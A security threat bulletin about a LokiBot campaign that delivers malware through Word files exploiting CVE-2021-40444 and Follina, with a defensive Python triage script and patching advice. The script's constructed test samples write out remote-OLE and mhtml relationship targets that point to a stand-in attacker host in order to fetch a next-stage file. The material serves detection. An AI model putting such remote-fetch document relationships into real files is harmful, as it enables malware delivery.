Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware

Cyber Security Threat Summary:
“Microsoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called LokiBot on compromised systems. ‘LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015,’ Fortinet FortiGuard Labs researcher Cara Lin said. ‘It primarily targets Windows systems and aims to gather sensitive information from infected machines.’ The cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of CVE-2021-40444 and CVE-2022-30190 (aka Follina) to achieve code execution. The Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot. The injector also features evasion techniques to check for the presence of debuggers and determine if it's running in a virtualized environment” (The Hacker News, 2023).

Security Officer Comments:
Researchers at FortiGuard Labs uncovered a second document in May 2023 that takes a different route to the same payload: it carries an embedded VBA script that runs automatically through the “Auto_Open” and “Document_Open” procedures and then launches the final payload, LokiBot. LokiBot is built to harvest credentials and other data from many sources on the infected host, including web browsers, FTP clients, email clients, and a long list of other installed software. According to FortiGuard Labs, LokiBot has been active for several years, and its authors keep updating the info-stealer so that criminals can extract data from victims more easily. The operators also keep looking for more efficient ways to spread and infect systems, typically by exploiting document vulnerabilities such as the two above or by relying on VBA macros to launch their attacks.
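The two delivery paths described above (an external OLE/mhtml relationship that fetches a remote HTML file for CVE-2021-40444 or Follina, and a macro-enabled document that relies on auto-executing VBA) both leave static indicators inside the OOXML package, so they can be triaged before the file is ever opened. The following script is an added example written for this page, not code from Fortinet or The Hacker News: it unpacks a .docx/.docm in memory, lists every relationship marked TargetMode="External", checks for a vbaProject.bin part, and assigns a rough verdict. The sample packages and URLs it builds are constructed for the demonstration (the real campaign used a GoFile link, which is not reproduced here), and the verdict thresholds are a judgement call, not a vendor rule.

```python
"""Static triage of an OOXML Word document for remote-template/OLE links
and embedded VBA.  Added example; the sample files below are constructed."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
LINK_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"


def triage_docx(data: bytes) -> dict:
    """Return findings for the OOXML package held in `data`.

    external_targets: list of (rels_part, relationship_type_suffix, target)
    has_vba_project:  True when a vbaProject.bin part exists (macro document)
    verdict:          'high' (remote OLE / mhtml target), 'medium' (macros
                      only), or 'low' (nothing beyond ordinary hyperlinks)
    """
    external, has_vba = [], False
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            lower = name.lower()
            if lower.endswith("vbaproject.bin"):
                has_vba = True
            if lower.endswith(".rels"):
                root = ET.fromstring(z.read(name))
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode", "Internal") == "External":
                        rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                        external.append((name, rtype, rel.get("Target", "")))

    verdict = "low"
    for _, rtype, target in external:
        t = target.lower()
        # A remote OLE object, or an mhtml:/!x-usc: wrapped URL, is the
        # CVE-2021-40444 / Follina fetch; plain hyperlinks are common in
        # benign documents and are only recorded, not scored.
        if rtype == "oleObject" or t.startswith("mhtml:") or "!x-usc:" in t:
            verdict = "high"
    if verdict != "high" and has_vba:
        verdict = "medium"
    return {"external_targets": external, "has_vba_project": has_vba, "verdict": verdict}


def build_sample(rels_xml: str, with_vba: bool = False) -> bytes:
    """Build a minimal OOXML package in memory (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", rels_xml)
        if with_vba:
            # CFB magic followed by padding: a placeholder, not a real VBA project.
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
    return buf.getvalue()


RELS_HEAD = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">'
# attacker.invalid is a constructed host; the real lure pointed at a GoFile URL.
SAMPLE_REMOTE_OLE = build_sample(
    RELS_HEAD + f'<Relationship Id="rId1" Type="{OLE_REL}" '
    'Target="http://attacker.invalid/stage.html!" TargetMode="External"/></Relationships>')
SAMPLE_MHTML = build_sample(
    RELS_HEAD + f'<Relationship Id="rId1" Type="{OLE_REL}" '
    'Target="mhtml:http://attacker.invalid/w.html!x-usc:http://attacker.invalid/w.html" '
    'TargetMode="External"/></Relationships>')
SAMPLE_MACRO = build_sample(RELS_HEAD + "</Relationships>", with_vba=True)
SAMPLE_BENIGN = build_sample(
    RELS_HEAD + f'<Relationship Id="rId1" Type="{LINK_REL}" '
    'Target="https://www.fortinet.com/" TargetMode="External"/></Relationships>')

if __name__ == "__main__":
    for label, blob in [("remote-ole", SAMPLE_REMOTE_OLE), ("mhtml", SAMPLE_MHTML),
                        ("macro", SAMPLE_MACRO), ("benign", SAMPLE_BENIGN)]:
        print(label, triage_docx(blob))
```

For a real triage run, read the suspect file's bytes and pass them to triage_docx; a "high" verdict means the document reaches out to a remote object before any macro prompt, which is exactly the behaviour that patching CVE-2021-40444 and CVE-2022-30190 is meant to block. The check deliberately does not try to decompress the VBA stream to look for Auto_Open or Document_Open, because the MS-OVBA compression hides the source text from a byte search; use a dedicated VBA extractor for that step.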

Suggested Correction(s):
(Fortinet) To protect themselves, users should exercise caution when dealing with any Office documents or unknown files, especially those that contain links to external websites. It is essential to be vigilant and avoid clicking on suspicious links or opening attachments from untrusted sources. Additionally, keeping the software and operating systems up to date with the latest security patches can help mitigate the risk of exploitation by malware.

Link(s):
https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html
https://www.fortinet.com/blog/